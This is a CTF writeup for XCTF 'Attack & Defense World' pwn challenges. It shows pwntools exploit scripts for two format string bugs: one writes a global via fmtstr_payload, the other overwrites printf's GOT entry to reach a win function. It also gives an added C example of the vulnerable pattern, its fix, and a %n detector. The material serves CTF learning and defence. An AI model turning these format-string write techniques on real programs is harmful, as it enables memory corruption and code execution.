XCTF 攻防世界 (Attack & Defense World) - PWN writeups

I haven't done pwn for a while, so I'm trying my hand again.

Beginner practice

get-shell

Just nc to the service and you have the shell.

cgfsb

32-bit format string bug (printf) with the string on the stack. At first I forgot to searchmem and didn't notice that the string was on the stack.

```python
from pwn import *

context.log_level = 'debug'
p = process("./cgfsb")
pwnme = 0x0804A068  # global the challenge checks; it must become 8

# first prompt asks for a name; anything will do
p.sendline("1111")
p.recv()

# our input is the format string and also lives on the stack at
# argument index 10, so fmtstr_payload can write the value 8 to pwnme
payload = fmtstr_payload(10, {pwnme: 8})
p.sendline(payload)
p.interactive()
```
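The bug class behind cgfsb, shown from the C side as an added example (this is not code from the writeup or the challenge): the vulnerable pattern next to its fix, plus a small helper `count_directives` (assumed, not a library function) that counts printf conversions in untrusted input and singles out `%n`, the only directive that writes to memory. The global name `pwnme` is taken from the writeup.

```c
#include <stdio.h>
#include <string.h>

/* Global the challenge wants set to 8 (name from the writeup). */
int pwnme = 0;

/* Vulnerable shape of cgfsb: attacker-controlled bytes become the
 * format string, so "%10$n" style directives can store to memory.
 * gcc -Wformat-security warns on this call. */
int echo_vulnerable(const char *input) {
    char buf[100];
    snprintf(buf, sizeof buf, "%s", input);
    return printf(buf);
}

/* Fixed: the input is an argument, so "%n" inside it is plain text. */
int echo_fixed(const char *input) {
    return printf("%s\n", input);
}

/* Inspect a string for printf conversions. Returns the number of real
 * conversions ("%%" is a literal percent sign) and stores in *writes
 * the number of %n directives. Flags, width, precision, positional
 * "$" and length modifiers are skipped so "%10$n" counts as one. */
int count_directives(const char *s, int *writes) {
    int n = 0;
    *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')          /* "%%": literal, not a conversion */
            continue;
        while (*p && strchr("-+ #0123456789$.hlLqjzt", *p))
            p++;                /* flags / width / precision / length */
        if (!*p)
            break;              /* dangling '%' at end of string */
        n++;
        if (*p == 'n')
            (*writes)++;
    }
    return n;
}
```

A realistic defensive use of `count_directives` is in a log or input filter: any `%n` in data that reaches a `printf`-family call is a strong signal of the format string attack the writeup exploits.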

Newcomer level

mary_morton

A printf challenge. The attachment provided with the challenge also had problems, so I wasn't very interested... I'll just post someone else's exp.

```python
#!/usr/bin/env python

from pwn import *
from formatStringExploiter.FormatString import FormatString
from time import sleep

elf = ELF("./mary_morton")
context.binary = elf


def connect():
    """Start the target and consume the menu banner."""
    global p
    p = process(elf.file.name)
    p.recvuntil("Exit the battle \n")


def exec_fmt(s):
    """Send a format string through menu option 2 and return the output."""
    print("Sending: " + repr(s))
    p.sendline("2")
    sleep(0.1)
    p.sendline(s)
    ret = p.recvuntil("1. Stack Bufferoverflow Bug", drop=True)
    p.recvuntil("Exit the battle \n")
    return ret


winner = 0x4008DA  # address of the function that gives the flag
connect()

# our input starts at argument index 6; write winner over printf's GOT entry
fmtStr = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False)
fmtStr.write_q(elf.symbols['got.printf'], winner)

# the next printf call now jumps to winner
p.sendline("2")
p.interactive()
```